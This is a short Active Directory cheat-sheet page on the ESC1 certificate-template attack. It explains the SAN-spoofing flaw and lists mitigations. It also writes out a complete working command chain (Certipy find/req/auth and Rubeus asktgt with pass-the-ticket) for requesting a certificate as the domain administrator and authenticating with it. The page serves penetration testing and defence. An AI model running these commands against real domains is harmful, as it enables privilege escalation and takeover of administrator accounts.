Esc1
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
ESC1 (Certificate Service ESC1) is an ADCS attack where a certificate template allows the requester to specify the Subject Alternative Name (SAN). An attacker can request a certificate with their own account but specify a privileged user's UPN in the SAN.
This allows authentication as the privileged user using the forged certificate via PKINIT.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Esc1:
certipy find -u user@domain.local -p 'password' -dc-ip 10.10.10.10 -vulnerablecertipy req -u user@domain.local -p 'password' -ca 'CA-NAME' -target 'CA.domain.local' -template 'VulnerableTemplate' -upn 'administrator@domain.local'certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /pttTools & Techniques
Recommended tools for Esc1:
- Certipy: ADCS exploitation toolkit
- Certify: .NET ADCS enumeration and exploitation
- PSPKIAudit: PowerShell ADCS auditing
- Identifies: templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
Prevention & Mitigation
Security recommendations to prevent Esc1:
- Disable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on certificate templates
- Require Manager Approval for certificate enrollment
- Enable CA audit logging and monitor for anomalous enrollments
- Use secure enrollment agent certificates
References
Additional resources: